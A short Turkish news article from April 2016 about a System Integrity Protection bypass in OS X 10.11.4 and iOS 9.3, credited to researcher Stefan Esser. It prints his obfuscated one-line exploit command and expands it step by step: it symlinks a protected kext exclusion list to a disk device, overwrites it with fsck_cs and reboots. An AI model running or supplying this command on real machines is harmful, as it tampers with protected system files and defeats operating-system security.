İşte Apple Güvenliğini Geçmenizi Sağlayan Zararlı Kod
5.04.2016
OS X 10.11.4 ve iOS 9.3 güncellemelerini yükleyenleri pek de sevimli olmayan bir sürpriz bekliyor. 130 milyon Apple kullanıcısını etkileyen yetki yükseltme zafiyeti hala OS X El Capitan 10.11.4 ve iOS 9.3 güncellemelerinde de devam ediyor.
Apple’ın Sistem Bütünlük Koruması (SIP) güvenlik mekanizmasını etkileyen açıklığı yamamak için çıkartılan güncellemeler hala buna izin verir durumda. CVE-2016-1757 kayıtlı uzaktan komut çalıştırma izin veren sıfırıncı gün açıklığını kapatmak için çıkarttıkları yama hala buna izin veriyor.
İşin enteresanlığı, Alman güvenlik araştırmacısı Stefan Esser’in en son güncellenmiş SIP uygulamasını aşmak için kullanılacak zararlı kodun bir tweet’e bile sığabilecek kısalıkta olması.
Yayınlanan kod root yetkilerinde dahi değiştiremeyeceğiniz OS X konfigürasyon dosyasını değiştirmenize olanak veriyor.
İşte kodumuz: ln -s /S*/*/E*/A*Li*/*/I* /dev/diskX;fsck_cs /dev/diskX 1>&-;touch /Li*/Ex*/;reboot
Bu kod açıldığında aslında aşağıdaki gibi bir hal alıyor;
- ln -s /System/Library/Extensions/AppleKextExcludeList.kext/Contents/Info.plist /dev/diskX
- fsck_cs /dev/diskX 1>&-
- touch /Library/Extensions/
- Reboot
Bu kod ile Apple’ın SIP teknolojisini aşarak istediğimiz işlemi çalıştırabilmek elimizde.